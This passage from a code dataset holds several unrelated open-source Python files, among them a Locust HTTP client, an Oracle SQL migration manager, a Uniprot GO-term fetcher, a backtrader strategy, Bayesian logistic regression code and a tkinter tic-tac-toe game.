occur due to either \n        connection problems, or invalid HTTP status codes\n        \"\"\"\n        try:\n            return self.client.urlopen(url, method=method, **kwargs)\n        except FAILURE_EXCEPTIONS as e:\n            if hasattr(e, \"response\"):\n                r = e.response\n            else:\n                r = ErrorResponse()\n            r.error = e\n            return r\n    \n    def request(self, method, path, name=None, data=None, catch_response=False, stream=False, \\\n            headers=None, auth=None, **kwargs):\n        \"\"\"\n        Send an HTTP request.\n        Returns :py:class:`locust.contrib.fasthttp.FastResponse` object.\n\n        :param method: method for the new :class:`Request` object.\n        :param path: Path that will be concatenated with the base host URL that has been specified.\n            Can also be a full URL, in which case the full URL will be requested, and the base host \n            is ignored.\n        :param name: (optional) An argument that can be specified to use as a label in Locust's \n            statistics instead of the URL path. This can be used to group different URLs \n            that are requested into a single entry in Locust's statistics.\n        :param catch_response: (optional) Boolean argument that, if set, can be used to make a request \n            return a context manager to work as argument to a with statement. This will allow the \n            request to be marked as a fail based on the content of the response, even if the response \n            code is ok (2xx). 
The opposite also works, one can use catch_response to catch a request \n            and then mark it as successful even if the response code was not (i.e. 500 or 404).\n        :param data: (optional) Dictionary or bytes to send in the body of the request.\n        :param headers: (optional) Dictionary of HTTP Headers to send with the request.\n        :param auth: (optional) Auth (username, password) tuple to enable Basic HTTP Auth.\n        :param stream: (optional) If set to true the response body will not be consumed immediately \n            and can instead be consumed by accessing the stream attribute on the Response object.\n            Another side effect of setting stream to True is that the time for downloading the response \n            content will not be accounted for in the request time that is reported by Locust.\n        \"\"\"\n        # prepend url with hostname unless it's already an absolute URL\n        url = self._build_url(path)\n        \n        # store meta data that is used when reporting the request to locust's statistics\n        request_meta = {}\n        # set up pre_request hook for attaching meta data to the request object\n        request_meta[\"method\"] = method\n        request_meta[\"start_time\"] = default_timer()\n        request_meta[\"name\"] = name or path\n        \n        if auth:\n            headers = headers or {}\n            headers['Authorization'] = _construct_basic_auth_str(auth[0], auth[1])\n        elif self.auth_header:\n            headers = headers or {}\n            headers['Authorization'] = self.auth_header\n        \n        # send request, and catch any exceptions\n        response = self._send_request_safe_mode(method, url, payload=data, headers=headers, **kwargs)\n        \n        # get the length of the content, but if the argument stream is set to True, we take\n        # the size from the content-length header, in order to not trigger fetching of the body\n        if stream:\n            request_meta[\"content_size\"] = int(response.headers.get(\"content-length\") or 0)\n        else:\n            request_meta[\"content_size\"] = len(response.content or \"\")\n        \n        # Record the consumed time\n        # Note: This is intentionally placed after we record the content_size above, since \n        # we'll then trigger fetching of the body (unless stream=True)\n        request_meta[\"response_time\"] = int((default_timer() - request_meta[\"start_time\"]) * 1000)\n        \n        if catch_response:\n            response.locust_request_meta = request_meta\n            return ResponseContextManager(response)\n        else:\n            try:\n                response.raise_for_status()\n            except FAILURE_EXCEPTIONS as e:\n                events.request_failure.fire(\n                    request_type=request_meta[\"method\"], \n                    name=request_meta[\"name\"], \n                    response_time=request_meta[\"response_time\"], \n                    exception=e, \n                )\n            else:\n                events.request_success.fire(\n                    request_type=request_meta[\"method\"],\n                    name=request_meta[\"name\"],\n                    response_time=request_meta[\"response_time\"],\n                    response_length=request_meta[\"content_size\"],\n                )\n            return response\n    \n    def delete(self, path, **kwargs):\n        return self.request(\"DELETE\", path, **kwargs)\n    \n    def get(self, path, **kwargs):\n        \"\"\"Sends a GET request\"\"\"\n        return self.request(\"GET\", path, **kwargs)\n    \n    def head(self, path, **kwargs):\n        \"\"\"Sends a HEAD request\"\"\"\n        return self.request(\"HEAD\", path, **kwargs)\n    \n    def options(self, path, **kwargs):\n        \"\"\"Sends an OPTIONS request\"\"\"\n        return self.request(\"OPTIONS\", path, **kwargs)\n    \n    def patch(self, path, data=None, **kwargs):\n        \"\"\"Sends a PATCH request\"\"\"\n        return self.request(\"PATCH\", path, data=data, **kwargs)\n    \n    def post(self, path, data=None, **kwargs):\n        \"\"\"Sends a POST request\"\"\"\n        return self.request(\"POST\", path, data=data, **kwargs)\n    \n    def put(self, path, data=None, **kwargs):\n        
\"\"\"Sends a PUT request\"\"\"\n return self.request(\"PUT\", path, data=data, **kwargs)\n\n\nclass FastResponse(CompatResponse):\n headers = None\n \"\"\"Dict like object containing the response headers\"\"\"\n \n _response = None\n \n @property\n def text(self):\n \"\"\"\n Returns the text content of the response as a decoded string\n (unicode on python2)\n \"\"\"\n # Decode unicode from detected encoding.\n try:\n content = unicode(self.content, self.apparent_encoding, errors='replace')\n except (LookupError, TypeError):\n # A LookupError is raised if the encoding was not found which could\n # indicate a misspelling or similar mistake.\n #\n # A TypeError can be raised if encoding is None\n #\n # Fallback to decode without specifying encoding\n content = unicode(self.content, errors='replace')\n return content\n \n @property\n def apparent_encoding(self):\n \"\"\"The apparent encoding, provided by the chardet library.\"\"\"\n return chardet.detect(self.content)['encoding']\n \n def raise_for_status(self):\n \"\"\"Raise any connection errors that occured during the request\"\"\"\n if hasattr(self, 'error') and self.error:\n raise self.error\n \n @property\n def status_code(self):\n \"\"\"\n We override status_code in order to return None if no valid response was \n returned. E.g. in the case of connection errors\n \"\"\"\n return self._response is not None and self._response.get_code() or 0\n \n def _content(self):\n if self.headers is None:\n return None\n return super(FastResponse, self)._content()\n\n\nclass ErrorResponse(object):\n \"\"\"\n This is used as a dummy response object when geventhttpclient raises an error \n that doesn't have a real Response object attached. E.g. a socket error or similar\n \"\"\"\n headers = None\n content = None\n status_code = 0\n error = None\n text = None\n def raise_for_status(self):\n raise self.error\n\n\nclass LocustUserAgent(UserAgent):\n response_type = FastResponse\n \n def _urlopen(self, request):\n \"\"\"Override _urlopen() in order to make it use the response_type attribute\"\"\"\n client = self.clientpool.get_client(request.url_split)\n resp = client.request(request.method, request.url_split.request_uri,\n body=request.payload, headers=request.headers)\n return self.response_type(resp, request=request, sent_request=resp._sent_request)\n\n\nclass ResponseContextManager(FastResponse):\n \"\"\"\n A Response class that also acts as a context manager that provides the ability to manually \n control if an HTTP request should be marked as successful or a failure in Locust's statistics\n \n This class is a subclass of :py:class:`FastResponse ` \n with two additional methods: :py:meth:`success `\n and :py:meth:`failure `.\n \"\"\"\n \n _is_reported = False\n \n def __init__(self, response):\n # copy data from response to this object\n self.__dict__ = response.__dict__\n self._cached_content = response.content\n \n def __enter__(self):\n return self\n \n def __exit__(self, exc, value, traceback):\n if self._is_reported:\n # if the user has already manually marked this response as failure or success\n # we can ignore the default haviour of letting the response code determine the outcome\n return exc is None\n \n if exc:\n if isinstance(value, ResponseError):\n self.failure(value)\n else:\n return False\n else:\n try:\n self.raise_for_status()\n except FAILURE_EXCEPTIONS as e:\n self.failure(e)\n else:\n self.success()\n return True\n \n def success(self):\n \"\"\"\n Report the response as successful\n \n Example::\n \n with 
self.client.get(\"/does/not/exist\", catch_response=True) as response:\n if response.status_code == 404:\n response.success()\n \"\"\"\n events.request_success.fire(\n request_type=self.locust_request_meta[\"method\"],\n name=self.locust_request_meta[\"name\"],\n response_time=self.locust_request_meta[\"response_time\"],\n response_length=self.locust_request_meta[\"content_size\"],\n )\n self._is_reported = True\n \n def failure(self, exc):\n \"\"\"\n Report the response as a failure.\n \n exc can be either a python exception, or a string in which case it will\n be wrapped inside a CatchResponseError. \n \n Example::\n \n with self.client.get(\"/\", catch_response=True) as response:\n if response.content == \"\":\n response.failure(\"No data\")\n \"\"\"\n if isinstance(exc, six.string_types):\n exc = CatchResponseError(exc)\n \n events.request_failure.fire(\n request_type=self.locust_request_meta[\"method\"],\n name=self.locust_request_meta[\"name\"],\n response_time=self.locust_request_meta[\"response_time\"],\n exception=exc,\n )\n self._is_reported = True\n","repo_name":"heyman/locust","sub_path":"locust/contrib/fasthttp.py","file_name":"fasthttp.py","file_ext":"py","file_size_in_byte":15632,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"37"} +{"seq_id":"74435806508","text":"from pid_controller import PIDController\n\n\ndef main():\n pid = PIDController(1, 0.1, 0.5, -1, 1)\n pid # Just to ingore the linting warning\n print(\"This is a PID Controller Python Package\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"PedroS235/pid_controller_py","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":238,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"12600926685","text":"import os, cx_Oracle, re, ntpath\nfrom pathlib import Path\nfrom datetime import datetime, date\nfrom pladmin.database import Database\nfrom pladmin.files import Files\n\n\nclass Migrations(Files, Database):\n\n __dsPath = None\n __asPath = None\n __executeScripts = None\n __basePlPath = None\n __branch = None\n __created = None \n __toDay = None\n\n\n def __init__(self):\n super().__init__()\n \n def createScript(self, fileType, quantity=1, basicPl=False):\n \"\"\" create file type .sql \"\"\"\n path = self.script_dir_dml\n\n if fileType == 'ddl':\n path = self.script_dir_dll\n\n fileCreating = []\n \n for _ in range(quantity):\n date = datetime.now()\n today = date.strftime(\"%m%d%Y%H%M%S\")\n\n \"\"\" counting the scripts in the directory to get next sequences \"\"\"\n quantityScriptsDir = len(os.listdir(path)) + 1\n\n fileName = \"%s%s%s.sql\" % (fileType, today, quantityScriptsDir)\n FullPahtScript = \"%s/%s\" % (path, fileName)\n\n script = open(FullPahtScript, \"w+\")\n fileCreating.append(fileName)\n\n if basicPl == 'Y':\n self.__copyContentFile(files, self.__basePlPath)\n\n return fileCreating\n\n @staticmethod\n def __copyContentFile(nameFileWrite, nameFileCopy):\n \"\"\" this function copy file content and paste in other file \"\"\"\n try:\n with open(nameFileCopy) as f:\n with open(nameFileWrite, \"w\") as f1:\n for line in f:\n f1.write(line)\n except FileNotFoundError as e:\n raise\n\n def migrate(self, typeFile=\"\"):\n path = '/plsql/scripts/%s' % typeFile.upper()\n\n for filename in Path(path).rglob('*.sql'):\n if re.search(typeFile, ntpath.basename(filename).lower()):\n yield filename\n # self.executeMigration(FullName=filename)\n\n def executeMigration(self, 
FullName):\n        \"\"\" execute every SQL instruction in the given file and record the executed script \"\"\" \n        \n        scriptName = ntpath.basename(FullName)\n        dataScript = self.getScriptByName(scriptName=scriptName)\n\n        try:\n            if not dataScript:\n                with open(FullName, 'r') as scriptFile:\n                    # read the whole file into a string so cx_Oracle can run it as a script\n                    executeStatement = scriptFile.read()\n\n                if executeStatement:\n                    db = self.dbConnect()\n                    cursor = db.cursor()\n                    output = []\n\n                    # enable DBMS_OUTPUT\n                    cursor.callproc(\"dbms_output.enable\")\n                    cursor.execute(executeStatement)\n                    \n                    # perform loop to fetch the text that was added by PL/SQL\n                    textVar = cursor.var(str)\n                    statusVar = cursor.var(int)\n                    \n                    while True:\n                        # get output in oracle script\n                        cursor.callproc(\"dbms_output.get_line\", (textVar, statusVar))\n                        if statusVar.getvalue() != 0:\n                            break\n                        output.append(textVar.getvalue())\n                    \n                    dbmsOutPut = ' '.join(output)\n\n                    self.createMigration(scriptName=scriptName, status='OK',\n                        fullPath=FullName, typeScript=\"Prueba\", \n                        output=dbmsOutPut)\n                    \n                    # disable oracle DBMS_OUTPUT\n                    cursor.callproc(\"dbms_output.disable\")\n                    return 'success %s' % scriptName\n\n                else:\n                    return 'this file is blank'\n            \n            else:\n                return 'Nothing to migrate'\n        \n        except Exception as error:\n            raise\n            # if the script raises an error, stop the execution\n            # raise Exception('an error occurred in the execution of the script %s error: %s ' % (FullName, error))\n        \n    def checkPlaceScript(self):\n        \"\"\" check that DS scripts do not contain DDL commands \"\"\"\n\n        if len(os.listdir(self.__dsPath)) == 0:\n            return 'Nothing to check'\n        # These commands must be executed before production.\n        reservedWords = ['ALTER','CREATE', 'REPLACE', \n            'DROP', 'TRUNCATE', 'RENAME', 'GRANT', 'REVOKE']\n\n        scriptsMove = []\n        message = \"all script in order\"\n\n        for dirFiles in os.listdir(self.__dsPath):\n            scriptRevision = os.path.join(self.__dsPath, dirFiles)\n            with open(scriptRevision, 'r') as fileScript:\n                statement = fileScript.read()\n\n            for word in reservedWords:\n                existsWord = statement.count(word)\n\n                if existsWord > 0:\n                    scriptsMove.append(dirFiles)\n                    os.rename(scriptRevision, os.path.join(self.__asPath, dirFiles))\n                    break  # the file has already been moved; stop checking further words\n\n        if scriptsMove:\n            message = 'the scripts %s were moved to the AS scripts folder, because they contained ddl instructions' % scriptsMove\n        \n        return message\n    \n    def listAllMigration(self):\n        ds = os.listdir(self.__dsPath)\n        aS = os.listdir(self.__asPath)\n\n        return aS, ds\n    \n    def removeMigrations(self, migration):\n        try:\n            os.remove(migration)\n            return 'migration removed'\n        except FileNotFoundError as e:\n            return 'migration not found'\n    \n    def getMigration(self, migration, typeFile):\n        try:\n            path = os.path.join(self.__asPath, migration.upper())\n\n            if typeFile == 'ds':\n                path = os.path.join(self.__dsPath, migration.upper())\n\n            with open(path, 'r') as migration:\n                return migration.read()\n\n        except FileNotFoundError as e:\n            return 'migration not found'\n","repo_name":"Trilogy-Dominicana/PL-Admin","sub_path":"pladmin/migrations.py","file_name":"migrations.py","file_ext":"py","file_size_in_byte":6251,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"}
+{"seq_id":"5461876350","text":"import requests\nfrom nalaf.utils.cache import Cacheable\n\nclass GOTerms(Cacheable):\n    \"\"\"\n    Helper class that retrieves GO term annotations for proteins from Uniprot\n    and returns a dictionary mapping each requested Uniprot ID to its list of GO terms.\n    
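Results are cached via the Cacheable base class, so repeated lookups avoid extra HTTP requests.\n    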
\"\"\"\n def __init__(self):\n super().__init__()\n self.url = 'http://www.uniprot.org/uniprot/{}.txt'\n\n\n def get_goterms_for_uniprot_id(self, list_uniprotids):\n \"\"\"\n Get dictionary mapping from { UniprotID : [ GOTerms, ... ]\n :param list_geneids:\n :type list_geneids: [int] or [str] or int or str\n :return: dictionary uniprotid --> goterms-list\n \"\"\"\n return_dict = {}\n to_be_downloaded = []\n\n for uniprotid in list_uniprotids:\n if uniprotid in self.cache:\n return_dict[uniprotid] = self.cache[uniprotid]\n else:\n to_be_downloaded.append(uniprotid)\n\n if len(to_be_downloaded) == 0:\n return return_dict\n\n for uniprotid in to_be_downloaded:\n return_dict[uniprotid] = []\n r = requests.get(self.url.format(uniprotid))\n for line in r.text.splitlines():\n if line.startswith(\"DR GO;\"):\n startIndex = line.find('GO:')\n endIndex = startIndex+10\n return_dict[uniprotid].append(line[startIndex:endIndex])\n\n return return_dict\n","repo_name":"Rostlab/relna","sub_path":"relna/utils/go_utils.py","file_name":"go_utils.py","file_ext":"py","file_size_in_byte":1456,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"37"} +{"seq_id":"18926270534","text":"#!/usr/bin/python\nimport sys\nimport os\nimport json\nimport datetime\nfrom os import walk\nfrom datetime import timedelta\n\nclass partner_summary:\n def __init__(self):\n self.key_list = [\"M1\", \"M2\", \"m3\", \"M5\", \"nawala\", \"unlp\", \"uccgh\", \"kaznic\", \"twnic\", \"tlsa\"]\n self.state = [ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]\n\n def check_file(self, file_name, key):\n \"check whether name in file matches partner and remember key\"\n i = 0\n while (i < len(self.key_list)):\n if(file_name.find(self.key_list[i]) != -1):\n self.state[i] |= key\n i += 1;\n\n def save_as_json(self, f_name, year, month):\n \"Save the summary as a CSV file\"\n json_file = open(f_name, \"w\")\n json_file.write(\"{\\n\")\n json_file.write(\"\\\"date\\\" : \\\"\" + str(year) + \"-\" + format(month, \"02d\") + \"\\\",\\n\")\n json_file.write(\"\\\"year\\\" : \" + str(year) + \",\\n\")\n json_file.write(\"\\\"month\\\" : \" + str(month) + \",\\n\")\n json_file.write(\"\\\"partners\\\" : [\\n\")\n i = 0\n while (i < len(self.key_list)):\n if(i > 0):\n json_file.write(\",\\n\")\n m0= self.state[i]&1\n m1 = (self.state[i]>>1)&1\n json_file.write(\"[\\\"\" + self.key_list[i] + \"\\\",\" + str(m0) + \",\" + str(m1) + \"]\")\n i+=1\n json_file.write(\"]\\n\")\n json_file.write(\"}\\n\")\n json_file.close()\n\n# Main\n\nmetric_dirs = [ \"M1\", \"M2\" ]\nsummary = partner_summary()\nmypath = sys.argv[1]\nithi = sys.argv[2]\ncurrent = datetime.date.today()\nprevious = datetime.date(current.year, current.month, 1) - timedelta(days=1)\nbefore = datetime.date(previous.year, previous.month, 1) - timedelta(days=1)\ncurrent_month = str(current.year) + \"-\" + format(current.month, \"02d\")\nprevious_month = str(previous.year) + \"-\" + format(previous.month, \"02d\")\nbefore_month = str(before.year) + \"-\" + format(before.month, \"02d\")\n\ntlsa1 = \"tlsa-data-\" + current_month + \".csv\"\ntlsa2 = \"tlsa-data-\" + previous_month + \".csv\"\n\nfor (dirpath, dirnames, filenames) in walk(mypath):\n for file_name in filenames :\n z = 0\n try :\n z = os.path.getsize(os.path.join(dirpath, file_name))\n except(OSError, IOError):\n z = 0\n if (z > 0):\n if (file_name.endswith(\"_this_month.txt\")):\n summary.check_file(file_name, 1)\n if (file_name.endswith(\"previous_month.txt\")):\n summary.check_file(file_name, 2)\n if (file_name 
== tlsa1):\n summary.check_file(file_name, 1)\n if (file_name == tlsa2):\n summary.check_file(file_name, 2)\n\ni = 0\nwhile (i < len(metric_dirs)):\n m_dir = ithi + \"/\" + metric_dirs[i]\n for (dirpath, dirnames,filenames) in walk(m_dir):\n for file_name in filenames :\n z = 0\n try :\n z = os.path.getsize(os.path.join(dirpath, file_name))\n except(OSError, IOError):\n z = 0\n if (z > 0):\n if(file_name.find(previous_month) != -1):\n summary.check_file(file_name, 1)\n if (file_name.find(before_month) != -1):\n summary.check_file(file_name, 2)\n i+=1\n\nm_dir = ithi + \"/M5\" \nfor (dirpath, dirnames,filenames) in walk(m_dir):\n for file_name in filenames :\n z = 0\n try :\n z = os.path.getsize(os.path.join(dirpath, file_name))\n except(OSError, IOError):\n z = 0\n if (z > 0):\n if(file_name.find(current_month) != -1):\n summary.check_file(file_name, 1)\n if (file_name.find(previous_month) != -1):\n summary.check_file(file_name, 2)\n\nsummary.save_as_json(sys.argv[3], current.year, current.month)\n","repo_name":"private-octopus/ithitools","sub_path":"src/partnercheck.py","file_name":"partnercheck.py","file_ext":"py","file_size_in_byte":3773,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"21486182201","text":"import backtrader as bt\n\n\nclass BaseSignalStrategy(bt.SignalStrategy):\n params = {\"print_log\": True}\n\n def log(self, txt, dt=None, do_print=False):\n if self.params.print_log or do_print:\n dt = dt or self.datas[0].datetime.date(0)\n print(f\"{dt.isoformat()} - {txt}\")\n\n def notify_order(self, order):\n if order.status in [order.Submitted, order.Accepted]:\n # Buy/Sell order submitted/accepted to/by broker - Nothing to do\n return\n\n # Check if an order has been completed\n # Attention: broker could reject order if not enough cash\n if order.status in [order.Completed]:\n if order.isbuy():\n self.log(f\"Buy Executed - Price: {order.executed.price:.2f} - Cost: {order.executed.value:.2f}\")\n else: # Sell\n self.log(f\"Sell Executed - Price: {order.executed.price:.2f} - Cost: {order.executed.value:.2f}\")\n\n elif order.status in [order.Canceled, order.Margin, order.Rejected]:\n self.log(\"Order Canceled/Margin/Rejected\")\n\n def notify_trade(self, trade):\n if not trade.isclosed:\n return\n self.log(f\"Operation Profit, Gross {trade.pnl:.2f} - NET {trade.pnlcomm:.2f}\")\n","repo_name":"fernandoe/cr-server","sub_path":"src/fe_backtrader/engine/strategies/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19570891537","text":"__author__ = \"AivanF\"\n\nfrom os import environ\nfrom sqlalchemy.ext.asyncio import create_async_engine, AsyncSession\nfrom sqlalchemy.orm import declarative_base, sessionmaker, Session\nfrom sqlalchemy import Index, Column, Integer, String, JSON\nfrom sqlalchemy.future import select\n\nDATABASE_URL = environ.get(\"DATABASE_URL\", \"sqlite+aiosqlite:///./test.db\")\nengine = create_async_engine(DATABASE_URL, future=True, echo=True)\nasync_session = sessionmaker(engine, expire_on_commit=False, class_=AsyncSession)\nBase = declarative_base()\n\n\nasync def delete_database():\n async with engine.begin() as conn:\n await conn.run_sync(Base.metadata.drop_all)\n\n\nasync def create_database():\n async with engine.begin() as conn:\n await conn.run_sync(Base.metadata.create_all)\n\n\nclass Model(Base):\n __tablename__ = \"smth\"\n\n id = Column(Integer, 
primary_key=True)\n name = Column(String, nullable=False)\n data = Column(JSON, nullable=False)\n\n idx_main = Index(\"name\", \"id\")\n\n\nasync def create_object(db: Session, name: str, data: dict):\n connection = Model(name=name, data=data)\n db.add(connection)\n await db.flush()\n\n\nasync def get_objects(db: Session, name: str):\n raw_q = select(Model) \\\n .where(Model.name == name) \\\n .order_by(Model.id)\n q = await db.execute(raw_q)\n return q.scalars().all()\n","repo_name":"AivanF/Postgres-SQLAlchemy-FastAPI-problem","sub_path":"db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"23740351091","text":"from __future__ import print_function, division, absolute_import\nimport numpy as np\n\n'''\n We base on the code of SVGD released by its original author (Qiang Liu and Dilin Wang). Note that we also keep some\n of their comments in the code.\n\n Bayesian Logistic Regression (the same setting as Gershman et al. 2012):\n The observed data D = {X, y} consist of N binary class labels, \n y_t \\in {-1,+1}, and d covariates for each datapoint, X_t \\in R^d.\n The hidden variables \\theta = {w, \\alpha} consist of d regression coefficients w_k \\in R,\n and a precision parameter \\alpha \\in R_+. We assume the following model:\n p(\\alpha) = Gamma(\\alpha; a, b)\n p(w_k | a) = N(w_k; 0, \\alpha^-1)\n p(y_t = 1| x_t, w) = 1 / (1+exp(-w^T x_t))\n'''\n\n\nclass BayesianLR_VR:\n def __init__(self, X, Y, batchsize=100, a0=1, b0=0.01):\n self.X, self.Y = X, Y\n self.batchsize = min(batchsize, X.shape[0])\n self.a0, self.b0 = a0, b0\n\n self.N = X.shape[0]\n self.permutation = np.random.permutation(self.N)\n self.iter = 0\n\n def grad_ln_posterior(self, theta, data_idx=None):\n '''\n M: number of particles (i.e. theta)\n n: number of data points at which we compute the posterior (i.e. the number of elements in data_idx)\n N: number of all data points in the dataset\n D: dimension of each data point\n '''\n\n if data_idx is None:\n if self.batchsize > 0:\n batch = [i % self.N for i in range(self.iter * self.batchsize, (self.iter + 1) * self.batchsize)]\n ridx = self.permutation[batch]\n self.iter += 1\n else:\n ridx = np.random.permutation(self.X.shape[0])\n else:\n ridx = np.copy(data_idx)\n\n Xs = self.X[ridx, :] # n x D\n Ys = self.Y[ridx] # n\n\n w = theta[:, :-1] # logistic weights: M x D\n alpha = np.exp(theta[:, -1]) # the last column is logalpha\n d = w.shape[1] # D\n\n wt = np.multiply((alpha / 2), np.sum(w ** 2, axis=1)) # (M,)\n dalpha = d / 2.0 - wt + (self.a0 - 1) - self.b0 * alpha + 1 # (M,); the last term is the jacobian term\n\n coff = np.matmul(Xs, w.T) # n x M\n y_hat = 1.0 / (1.0 + np.exp(-1 * coff)) # n x M\n\n dw_data = np.matmul(((np.broadcast_to(np.vstack(Ys), (len(Ys), theta.shape[0])) + 1) / 2.0 - y_hat).T,\n Xs) # Y \\in {-1,1}\n dw_prior = -np.multiply(np.broadcast_to(np.vstack(alpha), (len(alpha), d)), w) # M x D\n dw = dw_data * 1.0 * self.N / Xs.shape[0] + dw_prior # re-scale to estimate the likelihood of the full\n # dataset from the likelihood of a minibatch\n\n return np.hstack([dw, np.vstack(dalpha)]) # first order derivative: M x (D + 1)\n\n def grad_ln_likelihood(self, theta, data_idx=None):\n '''\n M: number of particles (i.e. theta)\n n: number of data points at which we compute the likelihoods (i.e. 
the number of elements in data_idx)\n D: dimension of each data point\n '''\n\n if data_idx is None: # compute the likelihood of every data point in the full dataset\n data_idx = np.arange(self.N)\n\n w = theta[:, :-1] # logistic weights: M x D\n alpha = np.exp(theta[:, -1]) # the last column is logalpha: (M,)\n d = w.shape[1] # D\n\n wt = np.multiply((alpha / 2), np.sum(w ** 2, axis=1)) # (M,)\n dalpha_data = (d / 2.0 - wt + 1) * len(data_idx) / self.N # (M,)\n\n Xs = self.X[data_idx, :] # n x D\n Ys = self.Y[data_idx] # n\n\n coff = np.matmul(Xs, w.T) # n x M\n y_hat = 1.0 / (1.0 + np.exp(-1 * coff)) # n x M\n\n dw_data = np.matmul(((np.broadcast_to(np.vstack(Ys), (len(Ys), theta.shape[0])) + 1) / 2.0 - y_hat).T,\n Xs) # Y \\in {-1,1}\n\n return np.hstack([dw_data, np.vstack(dalpha_data)]) # M x (D + 1)\n\n def evaluation(self, theta, X_test, y_test):\n theta = theta[:, :-1]\n M, n_test = theta.shape[0], len(y_test)\n\n prob = np.zeros([n_test, M])\n for t in range(M):\n coff = np.multiply(y_test, np.sum(\n -1 * np.multiply(np.broadcast_to(theta[t, :], (n_test, len(theta[t, :]))), X_test), axis=1))\n prob[:, t] = np.divide(np.ones(n_test), (1 + np.exp(coff)))\n\n prob = np.mean(prob, axis=1)\n acc = np.mean(prob > 0.5)\n llh = np.mean(np.log(prob))\n return [acc, llh]\n\n def predict_in_dataset(self, theta, data_idx):\n '''\n Predict the labels given observations in the input dataset.\n\n theta: weights of the Bayesian logistic regression.\n\n data_idx: indices of the observations in the given dataset.\n '''\n return self.predict(theta, self.X[data_idx, :], self.Y[data_idx])\n\n def predict(self, theta, X_test, y_test=None):\n '''\n Predict the labels given observations.\n\n theta: weights of the Bayesian logistic regression.\n\n X_test: observations. Size N x D, where N is the number of observations and D is the dimension of each observation.\n\n y_test: corresponding true labels.\n '''\n theta = theta[:, :-1]\n M, n_test = theta.shape[0], len(y_test)\n\n prob = np.zeros([n_test, M])\n for t in np.arange(M):\n coeff = -1.0 * np.matmul(X_test, theta[t, :])\n prob[:, t] = np.divide(np.ones(n_test), (1 + np.exp(coeff)))\n\n prob = np.mean(prob, axis=1)\n y_pred = np.ones(n_test)\n y_pred[prob <= 0.5] = -1\n\n if y_test is None:\n return y_pred\n return y_pred, np.sum(y_pred == y_test)\n\n def eval_est_grad_var(self, theta, batchsize=None, shuffled_idx=None, variance_reduction=False, mu=None,\n theta_ss=None):\n '''\n Evaluate the standard deviation of the estimator of the full-batch gradient.\n shuffled_idx: the list of the shuffled indices of all data points in the dataset. If this list is not\n provided, the current permutation stored in this object will be used. By default, shuffled_idx = None.\n\n variance_reduction: if True, SVRG estimator if used. If False, the traditional mini-batch estimator is used.\n By default, variance_reduction = False.\n\n mu: used in SVRG (i.e. when variance_reduction = True). This is the gradient of log likelihood of full\n dataset evaluated with the snapshot value of the parameters. By default, mu = None.\n\n theta_ss: (snapshot theta) used in SVRG. This is a snapshot of parameters. 
By default, theta_ss = None.\n        '''\n        batchsize = self.batchsize if batchsize is None else batchsize\n        shuffled_idx = self.permutation if shuffled_idx is None else shuffled_idx\n        all_est_grad = None\n        true_grad = self.grad_ln_posterior(theta, shuffled_idx)  # (num_particles, particle_dim)\n        num_batches = int(np.ceil(self.N / batchsize))\n        if not variance_reduction:\n            for it in np.arange(num_batches):\n                batch = np.arange(it * batchsize, (it + 1) * batchsize) % self.N\n                ridx = shuffled_idx[batch]\n                rho = self.grad_ln_posterior(theta, ridx)  # (num_particles, particle_dim)\n                if all_est_grad is None:\n                    all_est_grad = rho\n                else:\n                    all_est_grad = np.hstack((all_est_grad, rho))  # (num_particles, particle_dim * num_batches)\n        else:\n            for it in np.arange(num_batches):\n                batch = np.arange(it * batchsize, (it + 1) * batchsize) % self.N\n                ridx = shuffled_idx[batch]\n                gradlnp_hat = self.grad_ln_posterior(theta, ridx)  # (num_particles, particle_dim)\n                rho = gradlnp_hat - self.grad_ln_likelihood(theta_ss,\n                                                            ridx) * self.N / batchsize + mu  # (num_particles, particle_dim)\n                if all_est_grad is None:\n                    all_est_grad = rho\n                else:\n                    all_est_grad = np.hstack((all_est_grad, rho))  # (num_particles, particle_dim * num_batches)\n        tmp = np.reshape((all_est_grad - np.tile(true_grad, (1, num_batches))) ** 2, (theta.shape[0], num_batches, -1))\n        # (num_particles, num_batches, particle_dim)\n        tmp = np.sqrt(np.mean(tmp, axis=1))  # (num_particles, particle_dim)\n        stddev_est_grad = np.mean(tmp, axis=0)  # (particle_dim,)\n        return stddev_est_grad\n","repo_name":"nhan-dam/svgd-variance-reduction","sub_path":"bayesian_logistic_regression.py","file_name":"bayesian_logistic_regression.py","file_ext":"py","file_size_in_byte":8582,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
+{"seq_id":"28126581636","text":"from tkinter import*\r\ndef callback(n,m):\r\n    global player\r\n    \r\n    if player==\"😍\" and states[n][m]==0 and stop_game==False: # We can also use the hash value of the emoji\r\n        b[n][m].configure(text='😍',fg='blue',bg='white')\r\n        states[n][m]='😍'\r\n        player='💔' \r\n        \r\n    if player==\"💔\" and states[n][m]==0 and stop_game==False:\r\n        b[n][m].configure(text='💔',fg='orange',bg='black')\r\n        states[n][m]='💔'\r\n        player='😍'\r\n    check_for_winner()\r\n    \r\ndef check_for_winner():\r\n    global stop_game\r\n    for i in range(3):\r\n        if states[i][0]==states[i][1]==states[i][2]!=0:\r\n            b[i][0].config(bg='gray')\r\n            b[i][1].config(bg='gray')\r\n            b[i][2].config(bg='gray')\r\n            stop_game=True\r\n    for i in range(3):\r\n        if states[0][i]==states[1][i]==states[2][i]!=0:\r\n            b[0][i].config(bg='gray')\r\n            b[1][i].config(bg='gray')\r\n            b[2][i].config(bg='gray')\r\n            stop_game=True    \r\n        \r\n    if states[0][0]==states[1][1]==states[2][2]!=0:\r\n        b[0][0].config(bg='gray')\r\n        b[1][1].config(bg='gray')\r\n        b[2][2].config(bg='gray')\r\n        stop_game=True    \r\n    if states[2][0]==states[1][1]==states[0][2]!=0:\r\n        